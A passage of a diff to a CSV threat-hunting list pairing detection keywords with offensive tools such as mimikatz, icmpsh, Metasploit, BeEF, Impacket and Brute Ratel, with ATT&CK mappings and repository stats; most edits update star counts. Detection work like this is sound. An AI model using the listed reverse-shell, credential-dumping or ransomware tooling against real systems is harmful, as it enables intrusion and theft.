TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*icmpsh.exe*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh.exe*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*icmpsh.git*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh_m.py*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*icmpsh_m.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh_m.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*icmpsh-m.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*icmpsh-m.c*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*icmpsh-m.pl*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.c*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.pl*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*icmpsh-master*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh-s.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*icmptunnel*","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*icyguider/LightsOut*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" -"*id::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*id::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*IDiagnosticProfileUAC.git*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*IDiagnosticProfileUAC-main*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*Idov31/Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" -"*idrac_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*idrac_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*idrac_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*idrac_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*IDSyscall.exe*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.sln*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.vcxproj*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall/IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall\IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"*ie_execcommand_uaf.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ie_win_fakenotification-clippy*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ie_win_htapowershell.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ie_win_missingflash-prettytheft*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_execcommand_uaf.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ie_win_fakenotification-clippy*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_htapowershell.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_missingflash-prettytheft*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*IERMTCBpbnRvIHByb2Nlc3MgOiA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*IIS-Backdoor.*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*IIS-Raid-master*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*iisreset.exe /stop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ikeforce.py*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","1","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" -"*ikescan2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ikescan2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ILBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*imapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*imapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*imaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*imaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*imp_Badger*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-* *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - 